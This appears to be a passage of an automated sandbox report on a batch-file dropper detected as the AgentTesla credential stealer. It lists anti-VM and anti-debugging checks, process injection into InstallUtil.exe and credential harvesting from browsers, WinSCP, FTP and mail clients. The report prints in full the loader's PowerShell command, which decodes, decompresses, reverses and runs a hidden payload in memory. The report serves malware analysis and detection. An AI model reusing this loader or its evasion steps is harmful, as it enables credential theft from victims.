Source: MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
Source: MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
Source: MustFlush.bat.Dmf, 00000010.00000002.1598733729.0000000008DD1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMwareVBox
Source: InstallUtil.exe, 00000008.00000002.1507157762.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D3D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_014170B0 CheckRemoteDebuggerPresent, 18_2_014170B0
Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process queried: DebugPort
Enables debug privileges
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7A0000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7A0000 Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7A2000 Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7DE000 Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7E0000 Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 5DB008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\Desktop\ilZhNx3JAc.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null" Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\MustFlush.bat" " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\AppData\Roaming\MustFlush.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null" Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf c:\users\user\desktop\ilzhnx3jac.bat.dmf -windowstyle hidden -command "$ddjudzf = get-content 'c:\users\user\desktop\ilzhnx3jac.bat' | select-object -last 1; $qttfylkd = [system.convert]::frombase64string($ddjudzf);$cohunv = new-object system.io.memorystream( , $qttfylkd );$wepcwpnqbxa = new-object system.io.memorystream;$xtcusn = new-object system.io.compression.gzipstream $cohunv, ([io.compression.compressionmode]::decompress);$xtcusn.copyto( $wepcwpnqbxa );$xtcusn.close();$cohunv.close();[byte[]] $qttfylkd = $wepcwpnqbxa.toarray();[array]::reverse($qttfylkd); $arcfhlmphge = [system.appdomain]::currentdomain.load($qttfylkd); $cqife = $arcfhlmphge.entrypoint; $cqife.declaringtype.invokemember($cqife.name, [system.reflection.bindingflags]::invokemethod, $null, $null, $null)| out-null"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf c:\users\user\appdata\roaming\mustflush.bat.dmf -windowstyle hidden -command "$ddjudzf = get-content 'c:\users\user\appdata\roaming\mustflush.bat' | select-object -last 1; $qttfylkd = [system.convert]::frombase64string($ddjudzf);$cohunv = new-object system.io.memorystream( , $qttfylkd );$wepcwpnqbxa = new-object system.io.memorystream;$xtcusn = new-object system.io.compression.gzipstream $cohunv, ([io.compression.compressionmode]::decompress);$xtcusn.copyto( $wepcwpnqbxa );$xtcusn.close();$cohunv.close();[byte[]] $qttfylkd = $wepcwpnqbxa.toarray();[array]::reverse($qttfylkd); $arcfhlmphge = [system.appdomain]::currentdomain.load($qttfylkd); $cqife = $arcfhlmphge.entrypoint; $cqife.declaringtype.invokemember($cqife.name, [system.reflection.bindingflags]::invokemethod, $null, $null, $null)| out-null"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf c:\users\user\desktop\ilzhnx3jac.bat.dmf -windowstyle hidden -command "$ddjudzf = get-content 'c:\users\user\desktop\ilzhnx3jac.bat' | select-object -last 1; $qttfylkd = [system.convert]::frombase64string($ddjudzf);$cohunv = new-object system.io.memorystream( , $qttfylkd );$wepcwpnqbxa = new-object system.io.memorystream;$xtcusn = new-object system.io.compression.gzipstream $cohunv, ([io.compression.compressionmode]::decompress);$xtcusn.copyto( $wepcwpnqbxa );$xtcusn.close();$cohunv.close();[byte[]] $qttfylkd = $wepcwpnqbxa.toarray();[array]::reverse($qttfylkd); $arcfhlmphge = [system.appdomain]::currentdomain.load($qttfylkd); $cqife = $arcfhlmphge.entrypoint; $cqife.declaringtype.invokemember($cqife.name, [system.reflection.bindingflags]::invokemethod, $null, $null, $null)| out-null" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf c:\users\user\appdata\roaming\mustflush.bat.dmf -windowstyle hidden -command "$ddjudzf = get-content 'c:\users\user\appdata\roaming\mustflush.bat' | select-object -last 1; $qttfylkd = [system.convert]::frombase64string($ddjudzf);$cohunv = new-object system.io.memorystream( , $qttfylkd );$wepcwpnqbxa = new-object system.io.memorystream;$xtcusn = new-object system.io.compression.gzipstream $cohunv, ([io.compression.compressionmode]::decompress);$xtcusn.copyto( $wepcwpnqbxa );$xtcusn.close();$cohunv.close();[byte[]] $qttfylkd = $wepcwpnqbxa.toarray();[array]::reverse($qttfylkd); $arcfhlmphge = [system.appdomain]::currentdomain.load($qttfylkd); $cqife = $arcfhlmphge.entrypoint; $cqife.declaringtype.invokemember($cqife.name, [system.reflection.bindingflags]::invokemethod, $null, $null, $null)| out-null" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.InstallUtil.exe.7a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.MustFlush.bat.Dmf.6613670.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.MustFlush.bat.Dmf.6613670.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.1517390065.0000000002711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3806878045.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1407359736.0000000008F39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1547502534.00000000065FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1517390065.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1366787464.0000000004C96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3806878045.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1506272943.00000000007A2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3806878045.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1517946199.0000000004E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1517390065.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1598733729.0000000008DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ilZhNx3JAc.bat.Dmf PID: 6764, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7176, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MustFlush.bat.Dmf PID: 7520, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7684, type: MEMORYSTR
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\FTP Navigator\Ftplist.txt
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Yara detected Credential Stealer
Source: Yara match File source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.InstallUtil.exe.7a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.MustFlush.bat.Dmf.6613670.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.MustFlush.bat.Dmf.6613670.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.1407359736.0000000008F39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1547502534.00000000065FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1517390065.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1366787464.0000000004C96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1506272943.00000000007A2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3806878045.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1517946199.0000000004E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1598733729.0000000008DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ilZhNx3JAc.bat.Dmf PID: 6764, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7176, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MustFlush.bat.Dmf PID: 7520, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7684, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.InstallUtil.exe.7a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.MustFlush.bat.Dmf.6613670.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.MustFlush.bat.Dmf.6613670.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.1517390065.0000000002711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3806878045.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
